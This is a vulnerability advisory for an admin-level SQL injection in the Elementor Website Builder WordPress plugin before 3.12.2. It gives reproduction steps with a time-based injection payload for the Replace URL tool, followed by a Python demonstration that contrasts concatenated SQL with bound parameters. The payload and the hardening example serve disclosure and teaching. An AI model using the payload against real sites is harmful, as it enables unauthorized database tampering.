Elementor Website Builder < 3.12.2 - Admin+ SQLi

02 May 2023 00:00:00 | Reported by Sanjay Das | Type: wpexploit

Elementor website builder SQL injection vulnerability through admin+ sectio

1. Go to Elementor > Tools > Replace URL
2. Fill the first field with `http://localhost:8000/`
3. Fill the second field with `http://localhost:8000/?test'),meta_key='key4'where+meta_id=SLEEP(2);#`
4. Note the additional time taken by the request, demonstrating the SQL injection vulnerability.
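
Why the quote in step 3 matters, shown as an added example (not Elementor's code or the reporter's): it assumes the Replace URL query has the shape `UPDATE ... SET meta_value = REPLACE(meta_value, '<from>', '<to>')` and uses a constructed SQLite table in place of WordPress's MySQL `postmeta`. It contrasts string concatenation with bound parameters, the role `$wpdb->prepare()` plays in WordPress.

```python
import sqlite3

# Values from steps 2 and 3 of the page; here they are only ever input data.
FROM_URL = "http://localhost:8000/"
TO_URL = "http://localhost:8000/?test'),meta_key='key4'where+meta_id=SLEEP(2);#"


def make_db():
    """Constructed stand-in for a WordPress postmeta table (SQLite, not MySQL)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE postmeta (meta_id INTEGER PRIMARY KEY, meta_key TEXT, meta_value TEXT)"
    )
    conn.execute(
        "INSERT INTO postmeta (meta_key, meta_value) VALUES (?, ?)",
        ("_elementor_data", '[{"url":"http://localhost:8000/page"}]'),
    )
    return conn


def replace_url_concat(conn, old, new):
    """Assumed vulnerable shape: both URLs are pasted into the SQL text."""
    sql = (
        "UPDATE postmeta SET meta_value = REPLACE(meta_value, '"
        + old + "', '" + new + "') WHERE meta_key = '_elementor_data'"
    )
    try:
        conn.execute(sql)
        return "executed"
    except (sqlite3.Error, sqlite3.Warning) as exc:
        # The engine tried to parse part of the URL as SQL and refused it.
        return "parsed as SQL: %s" % exc


def replace_url_bound(conn, old, new):
    """Hardened shape: the URLs travel as bound parameters, never as SQL text."""
    conn.execute(
        "UPDATE postmeta SET meta_value = REPLACE(meta_value, ?, ?) "
        "WHERE meta_key = '_elementor_data'",
        (old, new),
    )
    return conn.execute("SELECT meta_key, meta_value FROM postmeta").fetchall()


if __name__ == "__main__":
    print(replace_url_concat(make_db(), FROM_URL, TO_URL))
    print(replace_url_bound(make_db(), FROM_URL, TO_URL))
```

SQLite has no `SLEEP()`, so the concatenated statement fails instead of pausing; the failure itself shows the second field reached the SQL parser, while the bound version stores the same string literally and leaves `meta_key` untouched.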

Vulners AI Score: 7.3 (High risk)
EPSS: 0.002